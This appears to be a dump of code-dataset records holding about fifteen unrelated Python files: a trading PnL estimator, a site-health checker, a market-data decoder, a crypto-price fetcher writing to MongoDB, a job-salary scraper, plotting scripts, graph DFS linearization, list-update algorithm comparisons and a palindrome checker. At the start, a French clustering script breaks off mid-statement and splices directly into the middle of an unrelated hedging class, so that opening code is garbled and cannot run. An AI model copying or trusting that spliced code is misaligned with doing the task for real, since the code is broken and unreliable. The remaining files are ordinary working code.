ligne in r:\n datediag=Date(ligne[-1])\n if Date(\"2015-01-01\")>datediag:\n if Date(\"2009-01-01\")<=datediag:\n dates_diag.append((-Date(\"2009-01-01\").delta(datediag),ligne[0]))\n dates_diag.append((Date(\"2009-01-01\").delta(datediag),ligne[0]))\nf.close()\n\ndates_diag.sort()\nn_max=dates_diag[-1][0]\nn_max+=72\n\nClusters_avant_diag = {1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0, 10:0, 11:0}\n\ndef remplir(tab,deb_seq,n_max,clusters):\n tab.append([])\n for k in range(24 + deb_seq//3):\n tab[-1].append(0)\n for i in range(0, -min(deb_seq//3,24)):\n# Clusters_avant_diag[int(clusters[i])] += 1\n tab[-1].append(clusters[i])\n for i in range(-min(deb_seq//3,0),len(clusters)):\n tab[-1].append(clusters[i])\n while len(tab[-1])= self.thau_zero_threshold),\n ['thau','lot']].reset_index(drop=True)\n hedge_client_kde = kde.KDE1D(hedge_client['thau'], covariance=kde.silverman_covariance,\n weights=hedge_client['lot'],\n lower=self.thau_zero_threshold, method=kde_methods.linear_combination,\n kernel=kernels.Epanechnikov())\n hedge_client_pdf = hedge_client_kde.pdf(self.greater_zero_thau_grid)\n hedge_client_pdf[hedge_client_pdf<0.0] = 0.0\n hedge_dealer = self.hedging_data.loc[(self.hedging_data['is_dealer'] == True) &\n (self.hedging_data['thau'] >= self.thau_zero_threshold),\n ['thau','lot']].reset_index(drop=True)\n hedge_dealer_kde = kde.KDE1D(hedge_dealer['thau'], covariance=kde.silverman_covariance,\n weights=hedge_dealer['lot'],\n lower=self.thau_zero_threshold, method=kde_methods.linear_combination,\n kernel=kernels.Epanechnikov())\n hedge_dealer_pdf = hedge_dealer_kde.pdf(self.greater_zero_thau_grid)\n hedge_dealer_pdf[hedge_dealer_pdf<0.0] = 0.0\n return hedge_client_pdf, hedge_dealer_pdf\n\n def load_hedging_deals_data_and_deals_ids(self):\n deals = self.deals_dao.get_clients_subset_deals_aggr_ids(self.start_date, self.end_date, self.instruments,\n self.lot_range, self.tenors, self.hours_range, self.minutes_range,\n self.including_rejects, self.account, self.client_name, self.pk)\n self.aggr_ids = deals['aggr_id'].tolist()\n self.mean_lot = deals['lot'].mean()\n params = {'aggr_ids': tuple(self.aggr_ids), 'thau_end': self.thau_density_endpoint}\n query = \"SELECT dealer, lot, thau FROM pk_hedge_deals where aggr_id in :aggr_ids and thau<=:thau_end;\"\n self.vertica_cursor.execute(query, params)\n self.hedging_data = pd.DataFrame(self.vertica_cursor.fetchall(), columns=['is_dealer', 'lot', 'thau'])\n\n def get_subspace_point_probabilites(self, hedging_data):\n # Estimate probability as proportion of all hedging deals\n total_vol = hedging_data['lot'].sum()\n zero_thau_vol_client = hedging_data.loc[\n (hedging_data['is_dealer'] == False) & (hedging_data['thau'] < self.thau_zero_threshold), 'lot'].sum()\n zero_thau_vol_dealer = hedging_data.loc[\n (hedging_data['is_dealer'] == True) & (hedging_data['thau'] < self.thau_zero_threshold), 'lot'].sum()\n greater_zero_thau_vol_client = hedging_data.loc[\n (hedging_data['is_dealer'] == False) & (hedging_data['thau'] >= self.thau_zero_threshold), 'lot'].sum()\n greater_zero_thau_vol_dealer = hedging_data.loc[\n (hedging_data['is_dealer'] == True) & (hedging_data['thau'] >= self.thau_zero_threshold), 'lot'].sum()\n return zero_thau_vol_client / total_vol, zero_thau_vol_dealer / total_vol, \\\n greater_zero_thau_vol_client / total_vol, greater_zero_thau_vol_dealer / total_vol\n\n def get_expected_pnl_data(self):\n self.prepare_interpolated_price_decay()\n zero_thau_pnl_client = self.price_decay.at[0.0, 'mean']\n if self.adjust_dealer == True:\n 
dealer_correction = self.get_dealer_price_correction(zero_thau_pnl_client)\n self.price_decay.loc[:, 'dealer_mean'] = self.price_decay.loc[:, 'mean'] - self.price_decay.loc[:, 'half_spread'] + dealer_correction\n else:\n self.price_decay.loc[:, 'dealer_mean'] = self.price_decay.loc[:, 'mean'] - self.price_decay.loc[:, 'half_spread']\n zero_thau_pnl_dealer = self.price_decay.at[0.0, 'dealer_mean']\n greater_zero_thau_pnl_client = self.price_decay.loc[self.price_decay.index >= self.thau_zero_threshold, 'mean']\n greater_zero_thau_pnl_dealer = self.price_decay.loc[self.price_decay.index >= self.thau_zero_threshold, 'dealer_mean']\n self.greater_zero_thau_grid = greater_zero_thau_pnl_client.index.values\n return zero_thau_pnl_client, zero_thau_pnl_dealer, greater_zero_thau_pnl_client, greater_zero_thau_pnl_dealer\n\n def get_dealer_price_correction(self, zero_thau_pnl_client):\n X = pd.DataFrame()\n X['db_target'] = (zero_thau_pnl_client - self.price_decay.loc[:, 'half_spread']) / self.sample_price\n X['half_spread'] = self.price_decay['half_spread'] / self.sample_price\n # X['lot_usd'] = self.mean_lot\n correction = self.dealer_price_model.predict(X.values)\n return correction*self.sample_price\n\n def prepare_interpolated_price_decay(self):\n self.equal_spaced_index = np.linspace(0.0, 3000.0, 3001)\n self.price_decay = self.price_decay.loc[self.price_decay.index >= 0.0]\n ts = pd.Series(index=self.equal_spaced_index)\n prepared_series = pd.concat([self.price_decay, ts]).sort_index().loc[:, ['mean', 'half_spread']].astype(float)\n interpolated = prepared_series.interpolate('index').loc[ts.index]\n interpolated = interpolated.loc[~interpolated.index.duplicated()]\n self.price_decay = interpolated\n\n def get_current_sample_price(self, instrument):\n # Sample price\n today = datetime.today()\n params = {'start': today - timedelta(days=30), 'end': today, 'instrument': instrument}\n query = \"SELECT price from prep_nonaggr where set_time>=:start and set_time<=:end and instr_name = :instrument ORDER BY set_time DESC LIMIT 1;\"\n self.vertica_cursor.execute(query, params)\n sample_price = self.vertica_cursor.fetchone()[0]\n return sample_price\n\n def get_density_data(self):\n return self.client_density, self.dealer_density\n\n def get_proba_data(self):\n return self.p_equal0_client, self.p_greater0_client, self.p_equal0_dealer, self.p_greater0_dealer\n\n def get_deal_ids(self):\n return self.aggr_ids\n\n\n\n","sub_path":"ClientAnalysis/ClientsPkPnlEstimation.py","file_name":"ClientsPkPnlEstimation.py","file_ext":"py","file_size_in_byte":10470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"242831452","text":"import argparse\nimport datetime\nimport requests\nfrom whois import whois\n\n\ndef load_urls4check(path):\n with open(path, 'r') as f:\n return [line.rstrip('\\n') for line in f.readlines()]\n\ndef is_server_respond_with_200(url):\n url = fix_url(url)\n try:\n response = requests.head(url)\n except requests.ConnectionError:\n return False\n return response.status_code == 200\n\ndef get_domain_expiration_date(domain_name):\n w = whois(domain_name)\n expiration_date = w.expiration_date\n if type(expiration_date) == list:\n return expiration_date[0]\n return expiration_date\n\ndef fix_url(url):\n if not url.startswith('http://') and not url.startswith('https://'):\n return 'http://{0}'.format(url)\n return url\n\ndef is_paid_more_then_month(expiration_date):\n if not expiration_date:\n return\n month_forward = datetime.datetime.now() - 
datetime.timedelta(days=-30) # subtracting a negative 30-day delta gives a date one month in the FUTURE; the original subtracted 30 days, so the check passed for any unexpired domain\n    return expiration_date >= month_forward\n\ndef pretty_print_check(url, expiration_date, status, need_extend):\n    print('Checking site: %s' % url)\n    print('Site is: {0}'.format('Available' if status else 'Offline'))\n    if expiration_date:\n        print('Domain expiration date: {0}'.format(expiration_date.strftime('%Y-%m-%d')))\n        if need_extend:\n            print('Domain {0} expires in less than one month'.format(url))\n        else:\n            print('Domain {0} paid more than one month'.format(url))\n    else:\n        print('Domain {0} now free for registration.'.format(url))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description=\"Check site availability and domain expiration\")\n    parser.add_argument(\"-p\", \"--path\", type=str, dest=\"filepath\", required=True)\n    options = parser.parse_args()\n    urls = load_urls4check(options.filepath)\n    for url in urls:\n        status = is_server_respond_with_200(url)\n        expiration_date = get_domain_expiration_date(url)\n        need_extend = not is_paid_more_then_month(expiration_date)\n        pretty_print_check(url, expiration_date, status, need_extend)\n","sub_path":"check_sites_health.py","file_name":"check_sites_health.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"196187901","text":"from decoder.field import BasicField, WireField, ComputedField, RepeatingGroup, TrimmedString, HexArray\nfrom decoder.descriptor import Descriptor\n\nfrom decoder.decoder import Decoder, Verbosity\n\n\nclass Decoder (Decoder):\n    \"\"\" SeqFwdJava decoder\n\n    This decoder processes SeqFwdJava\n\n    \"\"\"\n\n    def __parse_options (self, opts):\n        pass\n\n    def __init__ (self, opts, next_decoder):\n        super (Decoder, self).__init__ ('spry/seqfwd-java', opts, next_decoder)\n        self.__parse_options (opts)\n        # init summary data\n        self.__frame_sequence = 0\n        self.__decodingErrors = 0\n        self.__unhandled_messages = {}\n        self.__msg_counts = {}\n\n        # init message segment descriptors\n        self.__segmentDescriptors = {}\n        self.__segmentDescriptors['SeqFwdJava'] = Descriptor ([\n            WireField ('seqfwd-source-id', 'I', type=long),\n            WireField ('seqfwd-seq-num', 'I', type=long),\n            WireField ('seqfwd-unscaled-bid', 'I', type=long),\n            WireField ('seqfwd-bid-scale', 'I', type=long),\n            WireField ('seqfwd-bid-size', 'I', type=long),\n            WireField ('seqfwd-unscaled-ask', 'I', type=long),\n            WireField ('seqfwd-ask-scale', 'I', type=long),\n            WireField ('seqfwd-ask-size', 'I', type=long),\n            WireField ('seqfwd-symbol', '12s', type=TrimmedString),\n            WireField ('seqfwd-market', '4s', type=TrimmedString)\n\n        ])\n\n\n        # Init message detail dict\n\n        import string\n\n        ltrs = string.uppercase\n\n    def on_message (self, inputContext, payload):\n        \"\"\" Process SeqFwdJava packet\n\n        :rtype : none\n        :param inputContext: Message context built by preceding link in decoder chain\n        :param payload: Message payload\n        \"\"\"\n\n        self.__frame_sequence += 1\n\n        # parse the message payload\n        msgDescriptors = self.__segmentDescriptors['SeqFwdJava']\n        if msgDescriptors:\n            # decode non-empty payloads\n            decodedMessages, remainingPayload = self.decode_segment (msgDescriptors, payload)\n\n            # pass context & remaining payload to next link in decoder chain\n            if decodedMessages:\n                for decoded in decodedMessages:\n                    decoded.update ({\n                        'seqfwd-msg-type-name': 'SeqFwdJava',\n                        'sequence-number': decoded['seqfwd-seq-num']})\n\n                    decoded.update (inputContext)\n                    self.dispatch_to_next (decoded, remainingPayload)\n\n\n    def summarize (self):\n        \"\"\" Provides summary statistics from this 
Decoder\n        \"\"\"\n        return {\n            'UnhandledMsgTypeCodes': self.__unhandled_messages,\n            'TotalFramesReceived': self.__frame_sequence,\n            'MsgTypeCounts': self.__msg_counts\n        }\n\n\n","sub_path":"decoder/spry/seqfwd_java.py","file_name":"seqfwd_java.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"288003037","text":"import requests\nimport json\nimport datetime\nimport time\nfrom pymongo import MongoClient\n\ndefault_retries = 5\ndefault_wait = 30 # 30 seconds\nsucceeds = False\nretries = 0\n\n# Mongo client\nclient = MongoClient('mongodb', 27017)\n\ndef wait_and_retry():\n    global retries\n    retries += 1\n    print(\"retrying in %d seconds...\" % default_wait)\n    time.sleep(default_wait)\n\nwhile not succeeds and retries < default_retries:\n    # Request the top 10 cryptocoins\n    url = 'https://api.coinmarketcap.com/v1/ticker/?limit=10'\n    print(\"Requesting...\", datetime.datetime.now())\n    try:\n        r = requests.get(url)\n\n        coins = json.loads(r.content)\n\n        # Include time\n        for coin in coins:\n            coin[\"date\"] = datetime.datetime.now()\n\n        # Insert on mongo\n        db = client['criptocoins']\n        succeeds = db.coinmarketcap.insert_many(coins).acknowledged\n        if not succeeds:\n            wait_and_retry()\n    except Exception:\n        print(\"fail on fetch (%s)\" % datetime.datetime.now())\n        wait_and_retry()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"259244251","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: liuchang\n@software: PyCharm\n@file: list.py\n@time: 2020-01-28 14:11\n'''\nmultiples = [i for i in range(30) if i % 3 == 0]\nprint(multiples)\n\nsquared = []\nfor x in range(10):\n    squared.append(x**2)\nprint(squared)","sub_path":"Comprehensions/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"39399918","text":"import requests\nimport pandas as pd\n\nheader = {'User-Agent': 'api-test-agent'}\nframe = pd.read_csv('file.csv', sep=',')\nser_salary_from = pd.Series([])\n\ndef get_info_salary(num_id):\n    url = 'https://api.hh.ru/vacancies/' + str(num_id)\n    request = requests.get(url, headers=header)\n    if request.status_code == 200:\n        try:\n            salary_from = request.json()['salary']['from']\n        except Exception:\n            salary_from = -1\n\n    else:\n        print('ERROR')\n        print('STATUS = ' + str(request.status_code))\n        salary_from = -1 # fallback so the return below cannot raise NameError on failed requests\n\n    return salary_from\n\nfor i in range(0, len(frame)):\n    print(i)\n    ser_salary_from = ser_salary_from.append(pd.Series(get_info_salary(frame['id'][i])), ignore_index = True)\n\nframe.loc[:, 'salary_from'] = ser_salary_from\nframe.to_csv('file_id.csv')","sub_path":"load_salary.py","file_name":"load_salary.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"168233030","text":"#!/usr/bin/env python3\nimport argparse, os, subprocess, glob, math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots(3)\n[h, w] = fig.get_size_inches()\nfig.set_figheight(h*1.5)\nfig.set_figwidth(w*1.5)\ncol = ['blue', 'red', 'green', 'orange']\ni=0\nfs=14\nfor protein in [ '2k57', 'ub', '2kim']:\n    i=i+1\n    plt.subplot(3,1,i) \n    c=-1\n    for n in [1, 2, 4, 8]:\n        c=c+1 \n        file = \"../RESULTS/%s/%s%s_order_parameter.xvg\" % (protein, protein, str(n))\n        v =[]\n        with open(file, 
'r') as infile:\n for line in infile:\n line = line.strip('\\n')\n line = line.replace('[', '').replace(']', '').replace(',','')\n for e in line.split(' '):\n if e !='':\n v.append(float(e))\n l = len(v[0: int(len(v)/2)])\n plt.subplot(3,1,i)\n plt.plot(np.arange(1, l), np.array(v[0:l-1])**2, color=col[c], label=str(n))\n plt.fill_between(np.arange(1, l), np.array(v[0:l-1])**2 - np.array(v[l:-1])**2 , np.array(v[0:l-1])**2 + np.array(v[l:-1])**2 , color = col[c], alpha=0.5)\n if i == 1:\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=4, mode=\"expand\", borderaxespad=0., fontsize=fs) \n plt.text(56, 0.9, 'A', fontsize=fs)\n plt.yticks(fontsize=fs)\n plt.xticks(fontsize=fs)\n if i == 2:\n plt.text(78, 0.9, 'B', fontsize=fs)\n plt.ylabel('$S^2$', fontsize=fs+4)\n plt.yticks(fontsize=fs)\n plt.xticks(fontsize=fs)\n if i == 3:\n plt.text(104, 0.9, 'C', fontsize=fs)\n plt.yticks(fontsize=fs)\n plt.xticks(fontsize=fs)\n plt.xlabel('Residue', fontsize=fs)\n\nplt.savefig('../fig_S2.pdf', bbox_inches=\"tight\")\n\n\n# plt.xticks(fontsize=LG_FONTSIZE)\n# plt.yticks(fontsize=LG_FONTSIZE)\n# if i == 0:\n# plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=4, mode=\"expand\", borderaxespad=0., fontsize=LG_FONTSIZE) \n# plt.text(58, .8, CPT[i], fontsize=CPT_FONTSIZE)\n# if i == 1:\n# plt.ylabel('$S^2$', fontsize=LBL_FONTSIZE)\n# plt.text(80, .8, CPT[i], fontsize=CPT_FONTSIZE)\n# if i == 2:\n# plt.xlabel('Residue', fontsize=LBL_FONTSIZE)\n# plt.text(107, .8, CPT[i], fontsize=CPT_FONTSIZE)\n# plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=0.5)\n# plt.savefig('../fig_S2.pdf', bbox_inches='tight')\n\n\n\n","sub_path":"internal_order_parameter.py","file_name":"internal_order_parameter.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"251987207","text":"# _*_ coding: utf-8 _*_\n\"\"\"\n Created by Allen7D on 2019/10/25.\n\"\"\"\nfrom flask import Blueprint as _Blueprint\n\n__author__ = 'Allen7D'\n\n\nclass Blueprint(_Blueprint):\n\n def __init__(self, name, import_name, static_folder=None,\n static_url_path=None, template_folder=None,\n url_prefix=None, subdomain=None, url_defaults=None,\n root_path=None):\n super(Blueprint, self).__init__(name, import_name, static_folder,\n static_url_path, template_folder,\n url_prefix, subdomain, url_defaults,\n root_path)\n\n def register_redprint_list(self, rp_list):\n for api in rp_list:\n api.register(self)\n return self\n","sub_path":"app/libs/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52084933","text":"def dfs(graph):\n vertices = graph.keys()\n visited = set()\n\n clock = {}\n for vertex in vertices:\n clock[vertex] = []\n\n ticktock = [0]\n count = 0\n linearization_seq = []\n for vertex in vertices:\n if vertex not in visited:\n visited.add(vertex)\n explore(graph, vertex, visited, ticktock, clock, linearization_seq)\n count += 1\n\n print(\"Number of dfs calls=\", count)\n '''\n In a directed graph the number of explore calls depends on the \n \n '''\n\n\n\n print(\"clock = \", clock)\n\n\n linearization(linearization_seq)\n\ndef linearization(linearization_seq):\n print(linearization_seq)\n\n\n\ndef explore(graph, vertex, visited, ticktock, clock, linearization_seq):\n previsit(vertex, ticktock, clock)\n\n for node in graph[vertex]:\n if node not in visited:\n 
visited.add(node)\n            explore(graph, node, visited, ticktock, clock, linearization_seq)\n    postvisit(vertex, ticktock, clock, linearization_seq)\n\n\ndef previsit(node, ticktock, clock):\n    clock[node].append(ticktock[0])\n    ticktock[0] += 1\n    print(\"PREVISIT: \", node)\n\n\ndef postvisit(node, ticktock, clock, linearization_seq):\n    clock[node].append(ticktock[0])\n    linearization_seq.append(clock[node])\n    ticktock[0] += 1\n\n    print(\"POSTVISIT: \", node)\n\n\n\n# Fig 3.8 page 101 Papadimitriou. Connected acyclic graph directed\ngraph1 = {\n    'A': set(['C']),\n    'B': set(['A', 'D']),\n    'C': set(['E', 'F']),\n    'D': set(['C']),\n    'E': set([]),\n    'F': set([])\n\n}\n\n# Fig 3.4 page 99 Papadimitriou. Not connected directed graph\ngraph2 = {\n    'A': set(['B', 'C', 'F']),\n    'B': set(['E']),\n    'C': set(['D']),\n    'D': set(['A', 'H']),\n    'E': set(['F', 'G', 'H']),\n    'F': set(['B', 'G']),\n    'G': set([]),\n    'H': set(['G'])\n}\n\ndfs(graph1)\n","sub_path":"Archive/P/Graphs/graphs_revision2/9_linearization_directed.py","file_name":"9_linearization_directed.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"367868151","text":"import requests\n\nheaders = {\n    'Authorization': 'Bearer ACCESS_TOKEN',\n}\n\ndomain = 'https://drchrono.com'\n\npatients = []\npatients_url = '/api/patients'\nwhile patients_url:\n    data = requests.get(domain + patients_url, headers=headers).json()\n    patients.extend(data['results'])\n    patients_url = data['next'] # A JSON null on the last page\n","sub_path":"list_users.py","file_name":"list_users.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"286577414","text":"import copy\nimport random\n\n#read the file and remove the space\nfile = open('input.txt','r')\nS = file.read()\nL = S.split(' ')\nS = ''.join(L)\nfile.close() # the original had a bare file.close, which never actually closed the file\n#the original list of x1 x2 x3 .... 
xn\nOri_L = [0,1,2,3,4,5,6,7,8,9]\n#######################################################################\n#Optimal (Clear)\nOP_L = copy.deepcopy(Ori_L)\ntimes = [0,0,0,0,0,0,0,0,0,0]\nOP_result = []\nfor word in S:\n    times[int(word)] += 1\nfor i in range(0,10):\n    M = max(times)\n    OP_L[i] = times.index(M)\n    times[times.index(M)] = -1\n#calculate the total cost for each number of terms\nfor terms in range(50,1001,50):\n    total_count = 0\n    for word in range(0,terms):\n        counter = 0\n        while True:\n            if int(S[word]) == OP_L[counter]:\n                counter += 1\n                total_count += counter\n                break\n            else:\n                counter += 1\n                continue\n    OP_result.append(total_count)\nprint('Optimal: ',OP_result)\n#######################################################################\n#MTF (Clear)\ndef move_to_front(L,index):\n    '''move the element to the front (index = 0)'''\n    if index == 0:\n        return None\n    temp = L.pop(index)\n    L.insert(0,temp)\nMTF_result = []\n \nfor terms in range(50,1001,50):\n    MTF_L = copy.deepcopy(Ori_L)\n    total_count = 0\n    for word in range(0,terms):\n        counter = 0\n        while True:\n            if int(S[word]) == MTF_L[counter]:\n                move_to_front(MTF_L,counter)\n                counter += 1\n                total_count += counter\n                break\n            else:\n                counter += 1\n                continue\n    MTF_result.append(total_count)\nprint('MTF: ',MTF_result)\n#######################################################################\n#bit (Clear)\ndef init_bit(L):\n    '''initialize the list of bits, one bit per number'''\n    for i in range(0,10):\n        L[i] = random.randint(0,1)\n    return L\nBIT_L = copy.deepcopy(Ori_L)\nbit = [0,0,0,0,0,0,0,0,0,0]\nbit = init_bit(bit)\nINIT_bit = bit[:] # keep a true copy: plain assignment would alias the list, so the saved \"initial\" bits would mutate along with bit\nBIT_result = [] \n\nfor terms in range(50,1001,50):\n    BIT_L = copy.deepcopy(Ori_L)\n    bit = INIT_bit[:] # reset the bits from the saved copy for every run length\n    total_count = 0\n    for word in range(0,terms):\n        counter = 0\n        while True:\n            if int(S[word]) == BIT_L[counter]:\n                if bit[counter] == 1:\n                    bit[counter] = 0\n                    counter += 1\n                    total_count += counter\n                    break\n                else:\n                    bit[counter] = 1\n                    move_to_front(BIT_L,counter)\n                    move_to_front(bit,counter)\n                    counter += 1\n                    total_count += counter\n                    break\n            else:\n                counter += 1\n                continue\n    BIT_result.append(total_count)\nprint('BIT: ',BIT_result)\nprint(INIT_bit)\n#######################################################################\n#transpose (Clear)\ndef transpose(L,index):\n    '''swap the elements L[index] and L[index - 1] '''\n    if index == 0:\n        return None\n    temp = L[index - 1]\n    L[index - 1] = L[index]\n    L[index] = temp\nT_result = []\n\nfor terms in range(50,1001,50):\n    T_L = copy.deepcopy(Ori_L)\n    total_count = 0\n    for word in range(0,terms):\n        counter = 0\n        while True:\n            if int(S[word]) == T_L[counter]:\n                transpose(T_L,counter)\n                counter += 1\n                total_count += counter\n                break\n            else:\n                counter += 1\n                continue\n    T_result.append(total_count)\nprint('Transpose: ',T_result)\n#######################################################################\n#frequency count (Clear)\ndef rearrange(number_L,frequency,index):\n    '''rearrange the list according to the access frequencies'''\n    if index == 0:\n        return None\n    for i in range(index-1,-1,-1):\n        if frequency[i] < frequency[i + 1]:\n            temp = frequency[i]\n            frequency[i] = frequency[i + 1]\n            frequency[i + 1] = temp\n            temp = number_L[i]\n            number_L[i] = number_L[i + 1]\n            number_L[i + 1] = temp\nFC_result = []\n\nfor terms in range(50,1001,50):\n    MAX = 0\n    FC_L = copy.deepcopy(Ori_L)\n    access_frequency = [0,0,0,0,0,0,0,0,0,0]\n    total_count = 0\n    for word in range(0,terms):\n        counter = 0\n        while True:\n            if int(S[word]) == FC_L[counter]:\n                access_frequency[counter] += 1\n                rearrange(FC_L,access_frequency,counter)\n                
counter += 1\n total_count += counter\n break\n else:\n counter += 1\n continue\n FC_result.append(total_count)\nprint('frequency count: ',FC_result)\n#######################################################################\n#write result into file\nfile = open('output.txt','w')\n\nfile.write('Optimal:\\n')\nfor elem in OP_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('MTF:\\n')\nfor elem in MTF_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('Transpose:\\n')\nfor elem in T_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('BIT:\\n')\nfor elem in INIT_bit:\n file.write(str(elem))\nfile.write('\\n')\nfor elem in BIT_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('FC:\\n')\nfor elem in FC_result:\n file.write(str(elem))\n file.write('\\n')\nfile.close()","sub_path":"Prog1/Prog1.py","file_name":"Prog1.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"175159339","text":"# importing required modules \nimport matplotlib.pyplot as plt \nimport matplotlib.animation as animation \nimport numpy as np \n\n# create a figure, axis and plot element \nfig = plt.figure() \nax = plt.axes(xlim=(-25, 25), ylim=(-25, 25)) \nline, = ax.plot([], [], lw=2) \n\n# initialization function \ndef init(): \n\t# creating an empty plot/frame \n\tline.set_data([], []) \n\treturn line, \n\n# set of points for a star (could be any curve) \np = np.arange(0, 4*np.pi, 0.1) \nx = 12*np.cos(p) + 8*np.cos(1.5*p) \ny = 12*np.sin(p) - 8*np.sin(1.5*p) \n\n# animation function \ndef animate(i): \n\t# t is a parameter \n\tt = 0.1*i \n\t\n\t# x, y values to be plotted \n\tX = x*np.cos(t) - y*np.sin(t) \n\tY = y*np.cos(t) + x*np.sin(t) \n\t\n\t# set/update the x and y axes data \n\tline.set_data(X, Y) \n\t\n\t# return line object \n\treturn line, \n\t\n# setting a title for the plot \nplt.title('A rotating star!') \n# hiding the axis details \nplt.axis('off') \n\n# call the animator\t \nanim = animation.FuncAnimation(fig, animate, init_func=init, \n\t\t\t\t\t\t\tframes=100, interval=100, blit=True) \n\n# save the animation as mp4 video file \nanim.save('basic_animation.mp4', writer = 'ffmpeg', fps = 10) \n\n# show the plot \nplt.show() \n\n","sub_path":"graphs-in-py/3d_rotor.py","file_name":"3d_rotor.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"386625706","text":"import json\nimport traceback\n\nfrom goldfnd.lib.database import Database\nfrom goldfnd.lib.serverless import with_lambda_response\nfrom goldfnd.models.SendingSchedule import SendingSchedule\nfrom goldfnd.models.SurveyAnswerRule import SurveyAnswerRule\nfrom goldfnd.models.SurveyHistory import SurveyHistory\nfrom goldfnd.models.SurveyQuestion import SurveyQuestion\nfrom goldfnd.models.SurveyResponse import SurveyResponse\nfrom goldfnd.models.User import User\n\n\ndef get_answer_combination(answers, flagged_questions):\n question_ids = [question.id for question in flagged_questions]\n necessary_answers = []\n for answer in answers:\n if int(answer['survey_question_id']) in question_ids:\n necessary_answers.append(int(answer['survey_answer_id']))\n\n sorted_answers = [str(i) for i in list(sorted(necessary_answers))]\n return ''.join(sorted_answers)\n\n\n@with_lambda_response\ndef main(event, context):\n try:\n try:\n form_data = json.loads(event['body'])\n except TypeError:\n form_data = event['body']\n\n # 
register new user\n print(form_data)\n survey_id = form_data.get('survey_id')\n\n user_data = form_data.get('user_data')\n answers = form_data.get('answers')\n database = Database()\n\n # get proper reply_id\n new_user = User.add_user(database.session, user_data)\n flagged_questions = SurveyQuestion.get_flagged_questions(database.session)\n combination = get_answer_combination(answers, flagged_questions)\n reply_id = SurveyAnswerRule.find_proper_reply_id(database.session, combination)\n\n # register survey history\n new_survey_history = SurveyHistory.register(database.session, survey_id, new_user.id, reply_id)\n\n # register survey response\n inserted_row_count = SurveyResponse.register(database.session, survey_id, new_user.id, new_survey_history.id,\n answers)\n\n # setting up sending schedule\n new_schedule = SendingSchedule.register(database.session, new_user.id, reply_id)\n if not new_schedule:\n print('Message is already scheduled')\n\n if new_user:\n return {\n 'user_id': new_user.id,\n 'reply_id': reply_id,\n 'survey_history_id': new_survey_history.to_dict(),\n 'inserted_survey_response': inserted_row_count,\n 'will_send': new_schedule and new_schedule.reply_when or None\n }\n else:\n return {'message': 'FAILED'}, 500\n\n except Exception:\n traceback.print_exc()\n return {'message': 'FAILED'}, 500\n","sub_path":"goldfnd/functions/survey/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"218426342","text":"\"\"\"\nValid Palindrome\n\nA phrase is a palindrome if, after converting all uppercase letters into lowercase letters and removing all non-alphanumeric characters, it reads the same forward and backward. Alphanumeric characters include letters and numbers.\n\nGiven a string s, return true if it is a palindrome, or false otherwise.\n\nnput: s = \"A man, a plan, a canal: Panama\"\nOutput: true\nExplanation: \"amanaplanacanalpanama\" is a palindrome.\n\nInput: s = \"race a car\"\nOutput: false\nExplanation: \"raceacar\" is not a palindrome.\n\nInput: s = \" \"\nOutput: true\nExplanation: s is an empty string \"\" after removing non-alphanumeric characters.\nSince an empty string reads the same forward and backward, it is a palindrome.\n\"\"\"\n\ndef isValid(s: str) -> bool:\n res = []\n for ch in s:\n if ch.isalnum():\n res.append(ch.lower())\n \n i, j = 0, len(res)-1\n while i < j:\n if res[i] != res[j]:\n return False\n i += 1\n j -= 1\n return True\n\nprint(isValid(\"A man, a plan, a canal: Panama\"))\nprint(isValid(\"race a car\"))\nprint(isValid(\" \"))","sub_path":"valid_palindrome.py","file_name":"valid_palindrome.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"502203812","text":"# ---------------------- PROBLEM 48 (RANDOM) ----------------------------------#\n# A Graph is a non-linear data structure consisting of nodes and edges. 
